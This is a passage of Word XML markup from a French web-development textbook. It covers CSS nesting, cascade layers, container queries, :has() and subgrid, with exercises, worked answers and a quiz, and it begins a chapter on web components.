      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>37.6 Imbrication native</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le CSS permet désormais d'imbriquer des règles avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. La syntaxe évite deux pièges classiques de Sass : la concaténation de noms et les sélecteurs implicites.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Imbrication explicite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.carte {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: 1rem;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &amp;__titre { font-size: 1.2rem; }   /* invalide : pas de concaténation */</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &amp; .carte__titre { font-weight: 600; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &amp;:hover { border-color: var(--amber); }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &amp;.est-active { outline: 2px solid var(--navy); }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  .contenu &amp; { margin-block: 0; }  /* contexte externe explicite */</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>L'IMBRICATION NE REMPLACE PAS LA STRUCTURE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Imbriquer trois niveaux produit des sélecteurs longs et fragiles. Une bonne feuille de style reste majoritairement plate, avec des classes explicites héritées d'une convention de nommage.</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ADOPTER UNE NOUVEAUTÉ CSS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Vérifier l'usage réel dans les navigateurs ciblés.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Prévoir un repli acceptable sans la fonctionnalité.</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Isoler l'essai dans une branche ou derrière un drapeau.</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Mesurer le gain de lisibilité, pas seulement l'effet visuel.</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@layer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> règle les conflits sans augmenter la spécificité.</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L'ordre des couches se déclare une fois, en tête.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:has()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sélectionne un élément selon son contenu.</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requêtes de conteneur rendent un composant indépendant de la fenêtre.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cqi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exprime une taille relative au conteneur.</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subgrid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aligne les éléments de plusieurs cartes.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L'imbrication native ne concatène pas les noms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le CSS dispose désormais de tous les outils contemporains. Les deux chapitres suivants élargissent le propos : composants réutilisables, puis contenu multilingue.</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37.1 — Réorganiser une feuille de style en couches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   REFACTORISATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La feuille contient trois </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>!important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et des sélecteurs à quatre niveaux.</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Déclarez cinq couches.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Placez la réinitialisation, la base, les composants.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 xml:space="preserve">Supprimez les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>!important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 37.2 — Carte adaptative sans media query</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Une carte doit s'afficher en colonne dans une barre latérale et en ligne dans le contenu.</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Déclarez le conteneur.</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Écrivez deux requêtes de conteneur.</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Testez en redimensionnant le conteneur, pas la fenêtre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Exercice 37.3 — Formulaire piloté par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:has()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   CSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le bouton d'envoi reste grisé tant que les conditions ne sont pas remplies.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Cas de consentement obligatoire.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Champ requis vide.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Aucun JavaScript.</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37.1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@layer reset, base, composants, utilitaires, surcharges;</w:t>
        <w:br/>
        <w:br/>
        <w:t>@layer reset {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  *, *::before, *::after { box-sizing: border-box; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  body, h1, h2, p, ul { margin: 0; }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@layer base {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  body { font: 1rem/1.6 "Inter", system-ui, sans-serif; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  a { color: #0f2e4c; }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@layer composants {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .bouton { background: #e0a21b; color: #1f2933; }</w:t>
        <w:br/>
        <w:t>.bouton--secondaire { background: transparent; border: 1px solid currentColor;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@layer utilitaires {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .mt-2 { margin-block-start: 1rem; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les conflits se règlent par l'ordre des couches, plus par des sélecteurs toujours plus longs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>!important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> résiduel reste possible, mais son emplacement est identifié : la couche </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>surcharges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 37.2</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.contenu, .aside { container-type: inline-size; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>.carte { display: grid; gap: 1rem; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>@container (min-width: 28rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte { grid-template-columns: 10rem 1fr; align-items: start; }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@container (max-width: 18rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte__titre { font-size: 1rem; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte__meta { display: none; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le même composant s'adapte à deux contextes sans une seule règle supplémentaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La requête porte sur le parent : renommer les conteneurs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container-name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) évite les collisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 37.3</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form { }</w:t>
        <w:br/>
        <w:br/>
        <w:t>form button[type=submit] {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  opacity: .55;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pointer-events: none;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>form:has(#consentement:checked)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    :has(#courriel:valid):has(#nom:not(:placeholder-shown))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    button[type=submit] {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  opacity: 1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pointer-events: auto;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:has()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> combine trois conditions portant sur des champs différents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le serveur doit toujours valider : cette règle améliore l'expérience, elle ne protège rien.</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 xml:space="preserve">Que règle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@layer</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La vitesse de rendu</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L'ordre d'autorité entre groupes de règles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La taille des fichiers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 chargement des polices</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 xml:space="preserve">Que sélectionne </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:has(img)</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Les images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Les éléments contenant une image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Les voisins d'une image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Les parents d'images uniquement</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À quoi réagit une requête de conteneur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À la largeur de la fenêtre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À la largeur du parent déclaré</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À la résolution de l'écran</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Au zoom</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grid-template-rows: subgrid</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Crée une nouvelle grille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Hérite des lignes du parent</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Supprime les lignes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Aligne uniquement le texte</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 xml:space="preserve">L'imbrication CSS permet-elle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;__titre</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Oui</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Non, il n'existe pas de concaténation</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Seulement avec Sass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Uniquement en SCSS</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La cascade consulte les couches avant la spécificité.</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C'est un sélecteur relationnel descendant : l'élément qui contient.</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Elle s'appuie sur la taille d'un conteneur nommé, pas sur le viewport.</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L'élément participe aux pistes définies par la grille parente.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> représente le sélecteur parent ; aucune concaténation de chaînes n'existe en CSS natif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>38. Composants web et système de design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Construire une bibliothèque d'éléments réutilisables, documentés et partagés entre plusieurs projets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Avancé · Prérequis : chapitre 37</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Créer un élément personnalisé avec cycle de vie.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Isoler styles et structure avec le shadow DOM.</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Exposer une API d'attributs et d'événements claire.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Construire un système de jetons de design.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Documenter et maintenir une bibliothèque de composants.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>38.1 Trois technologies, un composant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les composants web reposent sur trois standards : les éléments personnalisés, le shadow DOM et les modèles HTML. Ensemble, ils permettent de créer une balise comme </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;carte-produit&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui fonctionne dans n'importe quel projet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.120 — Cinq briques et leur statut</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0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Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="405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225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Maturité</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Custom Elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Définir une balise et son cycle de vie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Shadow DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="405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Isoler structure et styles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Stable</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;template&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conserver un fragment inerte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Slots</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="405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Projeter du contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Stable</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attributs réactifs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Synchroniser propriétés et attributs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
